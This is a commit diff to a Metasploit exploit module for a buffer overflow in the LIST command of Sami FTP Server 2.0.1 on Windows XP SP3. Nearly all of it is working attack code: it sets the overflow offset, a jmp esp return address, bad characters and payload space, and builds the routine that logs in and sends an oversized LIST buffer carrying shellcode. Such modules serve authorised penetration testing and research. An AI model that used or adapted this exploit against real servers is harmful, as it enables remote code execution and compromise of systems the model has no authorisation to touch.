got everything working and cleaned up

Author: dougsko

modules/exploits/windows/ftp/sami_ftpd_list.rb

@@ -1,69 +1,74 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# Framework web site for more information on licensing and terms of use.
+#	http://metasploit.com/framework/
 ##
 
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = NormalRanking
+	Rank = AverageRanking
 
-	include Msf::Exploit::Remote::Tcp
-	#include Msf::Exploit::Remote::Seh
+	include Msf::Exploit::Remote::Ftp
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'KarjaSoft Sami FTP Server LIST Overflow',
-			'Description'	=> %q{
-                A buffer overflow is triggered when a long LIST command is sent to the
-                server and the user views the Log tab.
+			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+			'Description'	 => %q{
+					A buffer overflow is triggered when a long LIST
+				command is sent to the server and the user views the Log tab.
 			},
-			'Author'	=> [ 'Doug Prostko <dougtko[at]gmail.com>' ],
-			'License'	=> MSF_LICENSE,
-			'References'	=>
+			'Platform'		 => 'Windows',
+			'Author'		 =>
+				[
+					'superkojiman', # Original exploit
+					'Doug Prostko <dougtko[at]gmail.com>' # MSF module
+				],
+			'License'		 => MSF_LICENSE,
+			'References'	 =>
 				[
 					[ 'OSVDB', '90815'],
 					[ 'EDB', '24557'],
-                    [ 'URL', 'http://www.exploit-db.com/exploits/24557/'],
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'seh',
+					'target' => 0
 				},
-			'Platform' 	=> ['win'],
-			'Privileged'	=> false,
-			'Payload'	=>
+			'Privileged'	 => false,
+			'Payload'		 =>
 				{
-					'Space'			=> 950,
-					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
+					'Space'    => 900,
+					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
+					'StackAdjustment' => -3500,
 				},
-			'Targets' 	=>
+			'Targets'		 =>
 				[
-                   [ 'Automatic Targeting', { 'Ret' => 0x10028283, 'auto' => true } ], # jmp esp
+					[
+						'Windows XP English SP3',
+						{
+							'Platform' => 'win',
+							'Ret' => 0x10028283,
+							'Offset'   => 219,
+						},
+					],
 				],
 			'DisclosureDate' => 'Feb 27 2013'))
-
-		register_options(
-			[
-				Opt::RPORT(21),
-                OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
-                OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
-			], self.class)
 	end
 
 	def exploit
 		connect
 
-        buf = rand_text_alphanumeric(219)
-        buf << [target.ret].pack("V")
-        buf << make_nops(50) + payload.encoded
-        sock.put("USER #{datastore['FTPUSER']}\r\n")
-        sock.put("PASS #{datastore['FTPPASS']}\r\n")
-        sleep 0.5
-        print_status("Sending evil LIST command")
-        sock.put("LIST #{buf}\r\n")
+		print_status("Trying target #{target.name}...")
+
+		buf = rand_text_english(target['Offset'], payload_badchars)
+		buf << [ target['Ret'] ].pack('V')
+		buf << payload.encoded
+
+		send_cmd( ['USER', datastore['FTPUSER']] , false )
+		send_cmd( ['PASS', datastore['FTPPASS']], false )
+		send_cmd( ['LIST', buf], false )
 
 		handler
 		disconnect